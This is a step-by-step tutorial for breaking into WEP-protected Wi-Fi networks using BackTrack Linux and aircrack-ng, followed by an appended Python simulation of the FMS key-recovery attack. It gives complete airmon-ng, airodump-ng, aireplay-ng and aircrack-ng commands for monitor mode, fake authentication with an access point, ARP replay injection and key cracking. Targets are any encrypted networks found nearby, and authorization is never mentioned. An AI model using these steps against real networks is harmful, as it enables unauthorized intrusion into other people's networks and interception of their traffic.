
This is a tutorial on how to crack WEP networks. The assumption is that you have a wireless card whose driver supports packet injection. We'll be using the aircrack-ng suite, so make sure your card is compatible with it. For this tutorial I'm using an Atheros card. Broadcom cards and later Intel chipsets are also compatible with aircrack-ng. If you don't know whether your card can inject packets, or you want to buy one that can, the link below lists the best wireless cards for packet injection:

wireless cards

Next you need a working copy of BackTrack Linux. For this tutorial I'm using BackTrack 2, but later versions such as BackTrack 3 and 4 are fine too. Some of the commands differ between versions, so stick to BackTrack 2 if this is your first venture into Linux. BackTrack was built specifically for penetration testing and ships the aircrack-ng suite together with injection-capable drivers, which is why this is done from Linux rather than Windows.

click here to download Linux Backtrack 2. I'd suggest burning BackTrack 2 to a CD and setting your computer to boot from the CD drive. Running it as a live CD is simpler than installing it to your hard drive or a USB stick.

Before I even boot Linux or start injecting packets, I scope out which networks I can pick up from Windows. I'll start by running through the steps for cracking a WEP (Wired Equivalent Privacy) network. Then I'll go through the steps for cracking a WPA (Wi-Fi Protected Access) network.

If you try to connect to a network from Windows and it asks you for a key, the network is encrypted and is a candidate for testing; whether it is WEP rather than WPA is confirmed in Kismet below. Take a note of the network's name. Now you're ready to boot Linux from your CD drive. When it boots it will ask you to log in: enter "root" as the username and "toor" as the password, then type the command "startx" to start the BackTrack desktop.

First you need some information about the target network. We get it with Kismet, which is built into BackTrack. To run Kismet go to start (in BackTrack this is the small cog symbol at the bottom left of the screen) > BackTrack > Radio Network Analysis > 80211 > Analyzer > Kismet.

When Kismet runs it asks which interface to monitor; choose wifi0. A window opens listing the networks Kismet is picking up. Press S (sort) and then W to sort the list by encryption type, which groups the WEP networks together. Move to your target WEP network (the one you found in Windows) and press Enter.

Kismet now opens a window with details of the target. Get a pen and paper and note the SSID (the network name), the BSSID (the access point's MAC address) and the channel number; all three are needed below. One more important point: to crack the network you need at least one client connected to it. The attack works on captured data packets, and in step 4 we need a client on the network to generate the ARP request that we replay. Close Kismet now.

The next piece of information you need is your own MAC address, which is easy to get in Linux. Open a bash shell; its icon is in the toolbar at the bottom of the screen (it's roughly the equivalent of a DOS box in Windows). Type "ifconfig wifi0" (without the quotes) and hit Enter, then note your card's MAC address. It's a 12-hex-digit value such as 00:1D:56:8C:AA:23. The parent wifi0 interface prints a longer hardware address padded with zeros; only the first six pairs (12 hex digits) are the MAC address.

So we have the SSID, BSSID and channel number of the target network, and a note of our own MAC address. Let's get hacking.

STEP 1 - START THE WIRELESS INTERFACE IN MONITOR MODE ON THE AP CHANNEL

Now we put the wireless card into monitor mode. Monitor mode lets the card listen to every frame in the air on a channel; normally the card only passes up frames addressed to its own MAC address. In monitor mode you can capture the frames on the access point's (AP's) channel and inject your own. Open a new bash window and run:

airmon-ng

The system will respond with something similar to this :

        Interface   Chipset   Driver

        wifi0       Atheros   madwifi-ng
        ath0        Atheros   madwifi-ng VAP (parent: wifi0)
        ath1        Atheros   madwifi-ng
        kis         Atheros   madwifi-ng

Stop all of the athX interfaces, including ath0 and the kis interface. Don't stop wifi0 though, as it's the parent interface. Use the following command:

airmon-ng stop ath1 (repeat for each athX interface listed)

Once every athX interface is stopped, type the following command:

airmon-ng start wifi0

You should see the following :

        Interface   Chipset   Driver

        wifi0       Atheros   madwifi-ng
        ath0        Atheros   madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Notice that ath0 is now in monitor mode. It is the interface we'll be using for packet injections.

STEP 2 - START AIRODUMP-NG TO CAPTURE THE IVs

You don't need to know much about what an IV is to follow along. Briefly: an IV (initialisation vector) is a 24-bit value that WEP prepends, in cleartext, to every encrypted data frame and combines with the secret key to seed the RC4 cipher. Because the IV is so short and is sent in the clear, collecting a large number of data frames, each with its IV, gives aircrack-ng the statistical material it needs to recover the key. What we do now is start airodump-ng to capture the IVs from the target access point. This may be confusing on your first attempt, so don't worry too much about the specifics; just follow the steps.

To start airodump-ng, type the following into a new bash window:

airodump-ng -c (channel number) --bssid (MAC address of target network) -w output ath0

For example:

airodump-ng -c 9 --bssid 00:0E:8E:0C:28:F0 -w output ath0

"output" is the prefix of the file the captured IVs are written to. You can call it anything you want; I've used output for simplicity. Note that the interface is ath0 (with a zero), the monitor-mode interface from step 1.

This will open up a new window with something similar to this in it :

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

BSSID STATION PWR Lost Packets Probes

Leave this window open.

STEP 3 - USE AIREPLAY-NG TO DO A FAKE AUTHENTICATION WITH THE ACCESS POINT

This is a very important step and also where it gets interesting. For an access point to accept packets, the source MAC address must already be associated with it. If it isn't, the AP ignores the packets and sends a "DeAuthentication" packet in cleartext. You won't gather any IVs because the AP is discarding every injected packet. The single biggest reason packet injection fails is that the source MAC address isn't associated with the AP.

To associate with the access point we use fake authentication. Open a bash window and type the following (the 0 after -1 means authenticate once rather than re-authenticating on a timer):

aireplay-ng -1 0 -e (SSID) -a (MAC address of Access Point) -h (your own MAC address) ath0

For example :

aireplay-ng -1 0 -e BTHomeHub-3D4E -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Success looks like this :

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

For picky access points try:

aireplay-ng -1 6000 -o 1 -q 10 -e (SSID) -a (MAC address of Access Point) -h (your own MAC address) ath0

For example:

aireplay-ng -1 6000 -o 1 -q 10 -e BTHomeHub-3D4E -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Here 6000 re-authenticates every 6000 seconds, -o 1 sends only one set of packets per attempt (the default of several confuses some APs), and -q 10 sends a keep-alive every 10 seconds so the association isn't dropped.

STEP 4 - START AIREPLAY-NG IN ARP REQUEST REPLAY MODE

The purpose of this step is to start aireplay-ng in a mode where it listens for ARP (Address Resolution Protocol) requests and re-injects them into the network. We pick ARP requests because the AP normally re-broadcasts them, and since WEP encrypts each frame under a fresh IV, every replay and rebroadcast produces a new IV that airodump-ng stores. It sounds tricky, but once you see it working you'll understand it better.

Open another console session and enter the following :

aireplay-ng -3 -b (MAC address of AP) -h (your MAC address) ath0

for example :

aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Here is what the screen looks like when ARP requests are being injected :

Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

You can confirm it's working by checking the airodump-ng window. Remember in step 2 we started airodump-ng to capture and store the IVs? It should now look something like this:

CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782

the #/s in the above example is at 338. This is a decent number however it can range from 100 data packets a second to as high as 500 a second. Typically it's in the range of 300 to 500 per second.

STEP 5 - RUN AIRCRACK-NG TO OBTAIN THE WEP KEY

This is where it all bears fruit. Struggling with commands, having to re-associate with the network and scratching your head at the antics of Linux have all been worth it. We now run aircrack-ng to obtain the WEP key from the IVs gathered in the last step.

In a new console session enter the following command :

aircrack-ng -b (BSSID) -n 64 output*.cap

for example:

aircrack-ng -b 00:14:6C:7E:40:80 -n 64 output*.cap

Notice the -n 64 above. This tells aircrack-ng to try only 64-bit keys (a 40-bit secret key plus the 24-bit IV). The network may be using 128-bit WEP (a 104-bit secret key) instead. My advice is that if aircrack-ng runs at 64-bit for a fair length of time with no result, switch to 128-bit by entering the same command without -n 64:

for example

aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

You can run aircrack-ng while packets are still being generated; if the first pass fails it waits for more IVs and re-reads the capture file. With the older FMS/KoreK statistical attack you need roughly 250,000 IVs for a 64-bit key and roughly 1,500,000 for a 128-bit key; the PTW attack in aircrack-ng 0.9 and later needs far fewer, which is why the output below finds the key with under 100,000 IVs. Sweet success looks like this:

Aircrack-ng 0.9


[00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%
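The vote table above is the visible output of a statistical attack on RC4's key schedule, and it is the reason step 2 cares about collecting IVs rather than just any traffic. The following is an added example, not code from this tutorial or from aircrack-ng: a minimal Python simulation of the FMS (Fluhrer, Mantin and Shamir) attack on a 40-bit key. Everything in it is constructed for the simulation (the key 12:34:56:78:90, the weak IVs of the form (b+3, FF, x), and the first ciphertext byte of each frame, which is all FMS needs because every 802.11 data frame starts with the known SNAP byte 0xAA). It tallies one vote per IV for each key byte in turn, then searches the top-voted candidates in order and verifies each complete key against captured frames, which is what the "depth" column in aircrack-ng's output represents. Real aircrack-ng uses more IV classes (KoreK) and, from 0.9, the PTW attack, so it needs far fewer frames than this FMS-only version.

```python
"""FMS-style recovery of a 40-bit WEP key from weak-IV frames.

Added example, not code from the original tutorial or from aircrack-ng.
Everything here is constructed: the secret key, the IVs and the frames. Only
the first byte of each frame is modelled, because FMS needs nothing else.
"""
import random

# Assumed secret key for the simulation (the same value the page's aircrack-ng output shows).
KEY = [0x12, 0x34, 0x56, 0x78, 0x90]
# First plaintext byte of every 802.11 data frame is the LLC/SNAP DSAP 0xAA, so the
# first keystream byte is always recoverable from the first ciphertext byte.
SNAP_FIRST_BYTE = 0xAA


def rc4_ksa(key):
    """RC4 key scheduling over the per-packet key (IV || secret key)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_first_byte(key):
    """First keystream byte RC4 produces for the given per-packet key."""
    s = rc4_ksa(key)
    i, j = 1, s[1]
    s[i], s[j] = s[j], s[i]
    return s[(s[i] + s[j]) & 0xFF]


def make_frames(secret_key, seed=1):
    """Constructed capture: for each secret key byte b, one frame per weak IV
    (b+3, 0xFF, x). Each frame is (iv bytes, first ciphertext byte)."""
    frames = []
    for b in range(len(secret_key)):
        for x in range(256):
            iv = [b + 3, 0xFF, x]
            frames.append((bytes(iv), SNAP_FIRST_BYTE ^ rc4_first_byte(iv + list(secret_key))))
    random.Random(seed).shuffle(frames)   # capture order is irrelevant to the attack
    return frames


def fms_votes(frames, known_prefix):
    """Vote table (256 counters) for the next secret key byte, given the bytes already recovered."""
    i = 3 + len(known_prefix)             # index of the key byte under attack within IV || key
    votes = [0] * 256
    for iv, c0 in frames:
        key = list(iv) + list(known_prefix)
        s, j = list(range(256)), 0
        for step in range(i):             # run the KSA only as far as the known key bytes allow
            j = (j + s[step] + key[step]) & 0xFF
            s[step], s[j] = s[j], s[step]
        if s[1] >= i or ((s[1] + s[s[1]]) & 0xFF) != i:
            continue                      # not a "resolved" state: this IV says nothing about K[i]
        out = c0 ^ SNAP_FIRST_BYTE        # first keystream byte, from the known plaintext
        # If S[0], S[1] and S[i] survive the rest of the KSA (roughly 5% of the time),
        # out == S[j_i] where j_i is the KSA's j at step i, so K[i] = j_i - j - S[i].
        votes[(s.index(out) - j - s[i]) & 0xFF] += 1
    return votes


def recover_key(frames, key_len=5, depth=6):
    """Try the top `depth` voted candidates per byte (aircrack-ng's 'depth' column),
    verifying each complete key against a few captured frames."""
    sample = frames[:8]

    def verify(key):
        return all(rc4_first_byte(list(iv) + key) ^ SNAP_FIRST_BYTE == c0 for iv, c0 in sample)

    def search(prefix):
        if len(prefix) == key_len:
            return prefix if verify(prefix) else None
        votes = fms_votes(frames, prefix)
        for cand in sorted(range(256), key=lambda v: -votes[v])[:depth]:
            found = search(prefix + [cand])
            if found is not None:
                return found
        return None

    return search([])


if __name__ == "__main__":
    frames = make_frames(KEY)
    votes = fms_votes(frames, [])
    top = sorted(range(256), key=lambda v: -votes[v])[:5]
    print("KB 0:", " ".join(f"{v:02X}({votes[v]:3d})" for v in top))
    found = recover_key(frames)
    print("KEY FOUND!", ":".join(f"{b:02X}" for b in found) if found else "not found")
```

Run it directly and it prints a candidate line for key byte 0 in the same style as the table above, then the recovered key. With 256 weak IVs per key byte the correct value typically collects a dozen or so votes against about one for each wrong value; that margin is what the tutorial's advice to keep gathering IVs is buying you, and it is why the attack needs data frames (which carry IVs) rather than beacons.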
